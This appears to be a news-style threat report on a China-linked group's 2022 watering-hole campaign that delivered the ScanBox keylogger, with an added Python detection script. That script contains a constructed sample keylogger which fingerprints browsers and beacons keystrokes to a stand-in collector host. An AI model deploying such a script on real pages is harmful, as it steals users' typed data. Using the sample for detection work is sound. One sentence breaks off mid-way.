ScanBox Keylogger and Watering Hole Attacks: The New Cyber Threat to Australian Organizations and Offshore Energy Firms

Researchers have discovered a watering hole attack, probably carried out by the APT TA423, that attempts to load the JavaScript-based ScanBox reconnaissance framework.

A China-linked threat actor has stepped up a campaign to deliver the ScanBox reconnaissance framework to targets including Australian domestic organizations and offshore energy companies operating in the South China Sea. The advanced persistent threat (APT) group lures victims with tailored messages that appear to link back to Australian news websites.

According to a report released Tuesday by Proofpoint’s Threat Research Team together with PwC’s Threat Intelligence team, the espionage activity is believed to have begun in April 2022 and continued through mid-June 2022.

Researchers attribute the activity to the China-based APT TA423, also known as Red Ladon. According to the report, Proofpoint assesses with moderate confidence that the campaign can be linked to TA423/Red Ladon, which several reports place on Hainan Island, China.

The group has drawn attention because of recent legal action: a 2021 indictment by the US Department of Justice alleges that TA423/Red Ladon has consistently supported the Hainan Province Ministry of State Security (MSS).

The MSS is the People’s Republic of China’s civilian intelligence, security and cybersecurity agency. It is generally understood to handle counter-intelligence, foreign intelligence and political security, and to be connected to China’s industrial and cyber espionage activities.

Polishing Up the ScanBox

The campaign uses the ScanBox framework: a versatile, customizable JavaScript-based toolkit that adversaries use for covert reconnaissance.

For close to ten years, adversaries have used ScanBox, a tool notable for its ability to support counter-intelligence operations. What makes it even more remarkable is that attackers don’t need to infiltrate the target’s system with

“What makes ScanBox especially threatening is its ability to pilfer data without needing to effectively install malware onto the disk – it simply needs its JavaScript code to be run through a web browser,” PwC researchers said while discussing a past campaign.

Rather than deploying malware, attackers pair ScanBox with a technique known as a watering hole attack. The actors upload malicious JavaScript to a compromised website, where ScanBox operates like a keylogger, capturing everything a user types on the infected site, the so-called watering hole.

TA423’s campaign began with phishing emails bearing subject lines such as “Sick Leave,” “User Research,” and “Request Cooperation.” The emails often claimed to come from a staff member of the “Australian Morning News,” which is in reality a non-existent entity. The supposed employee urged recipients to visit their “modest news website,” australianmorningnews[.]com.

“When users clicked on the link and were redirected to the website, they encountered the ScanBox framework,” noted the experts.

The link took victims to a page whose content was copied from legitimate news sites such as the BBC and Sky News, and which at the same time delivered the ScanBox framework.

Information harvested from watering holes via the ScanBox keylogger is one stage of a multi-stage attack, giving attackers useful insight into likely targets that they can use to plan future intrusions. This technique is commonly referred to as browser fingerprinting.

The initial script collects an array of data about the target machine, including the operating system, language, and installed Adobe Flash version. ScanBox also checks for browser extensions, plugins, and components such as WebRTC.

“The module utilizes WebRTC, a complimentary and open-source technology that is compatible with all prominent browsers. This technology enables web browsers and mobile apps to carry out immediate communication (RTC) via application programming interfaces (APIs). This capability empowers ScanBox to link up with a series of predetermined targets,” as explained by the researchers.

Adversaries can make use of a technology called STUN, short for Session Traversal Utilities for NAT: a standardized set of methods, including a network protocol, that lets interactive communications such as real-time voice, video and chat applications traverse network address translator (NAT) gateways, the researchers explain.

STUN is supported by the WebRTC protocol, with the help of a third-party STUN server located on the internet. That server lets hosts detect whether a NAT is present and discover the mapped (public) IP address and port number that the NAT has allocated for the application’s UDP flows to remote hosts. ScanBox uses STUN servers for NAT traversal as part of Interactive Connectivity Establishment (ICE), a peer-to-peer connectivity method that tries to let clients connect as directly as possible, working around NATs, firewalls and other obstacles, the researchers found.

In other words, the ScanBox module can establish ICE sessions with STUN servers and can still reach target systems even when they sit behind NAT, the researchers explained.
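The behaviours described above (keystroke capture on a watering-hole page, beaconing to a foreign host, browser fingerprinting and WebRTC/STUN probing) can be turned into a simple static triage check that a defender runs over JavaScript pulled from a suspect page. The code below is an added example, not Proofpoint’s or PwC’s detection logic; the regex heuristics, the host names and the two sample scripts are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Heuristics for the ScanBox-style behaviours the article describes.
# Constructed for this example; not a vendor signature set.
INDICATORS = {
    "keystroke_capture": re.compile(
        r"""addEventListener\s*\(\s*['"]key(?:down|press|up)['"]|\.onkey(?:down|press|up)\s*="""),
    "fingerprinting": re.compile(
        r"navigator\.(?:plugins|mimeTypes|language|platform|userAgent)|ShockwaveFlash"),
    "webrtc_stun": re.compile(r"RTCPeerConnection|iceServers|\bstun:"),
    "beacon": re.compile(r"XMLHttpRequest|fetch\s*\(|new\s+Image\s*\(|\.src\s*="),
}
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")

# Constructed sample: a compromised news page (watering hole) and the script it served.
PAGE_HOST = "news.example.invalid"
SUSPICIOUS_SCRIPT = """
var buf = '';
document.addEventListener('keydown', function (e) { buf += e.key; });
var fp = navigator.platform + '|' + navigator.language + '|' + navigator.plugins.length;
try { new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {}
var pc = new RTCPeerConnection({iceServers: [{urls: 'stun:stun.example.invalid:3478'}]});
setInterval(function () {
  new Image().src = 'https://collector.example.invalid/c?d=' + encodeURIComponent(buf + fp);
}, 5000);
"""
# Constructed benign control: a search box that submits to the page's own host.
BENIGN_SCRIPT = """
document.getElementById('q').addEventListener('keydown', function (e) {
  if (e.key === 'Enter') { fetch('https://news.example.invalid/search?q=' + this.value); }
});
"""

def external_hosts(script, page_host):
    """Hosts referenced by absolute URLs in the script that differ from the page's own host."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(script)}
    return sorted(h for h in hosts if h and h != page_host)

def analyze_script(script, page_host):
    """Return the indicator names that matched plus any foreign hosts the script talks to."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"indicators": hits, "external_hosts": external_hosts(script, page_host)}

def is_scanbox_like(report):
    """Keystroke capture plus a beacon to a host other than the page's own is the
    watering-hole keylogger pattern; fingerprinting or STUN hits add confidence."""
    ind = set(report["indicators"])
    return "keystroke_capture" in ind and "beacon" in ind and bool(report["external_hosts"])
```

The control script registers a keydown handler and calls fetch, so indicator matching alone would misfire; it is the off-host beacon that separates the two.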

Cyber Adversaries

“The cyber adversaries are believed to be aiding the Chinese government on issues concerning the South China Sea, especially during the recent disturbances in Taiwan,” Sherrod DeGrippo, the lead at Proofpoint for threat research and detection, clarified in a statement. “This specific group seems to be interested in identifying those active in the area and, although we can’t confirm, their concentration on naval affairs is likely to persist as a continual focus in regions such as Malaysia, Singapore, Taiwan, and Australia.”

Historically, the group’s reach has extended well beyond Australasia. A July 2021 Department of Justice indictment alleges that the group stole trade secrets and proprietary business information from victims in the USA, Austria, Cambodia, Canada, Germany, Indonesia, Malaysia, Norway, Saudi Arabia, South Africa, Switzerland, and the UK. The targeted industries included aviation, defense, education, government, healthcare, biopharmaceuticals and maritime, among others.

Even after the Department of Justice’s charges, researchers have not seen a significant change in TA423’s operations, and they expect TA423, also known as Red Ladon, to carry on with its intelligence-collection and espionage mission.
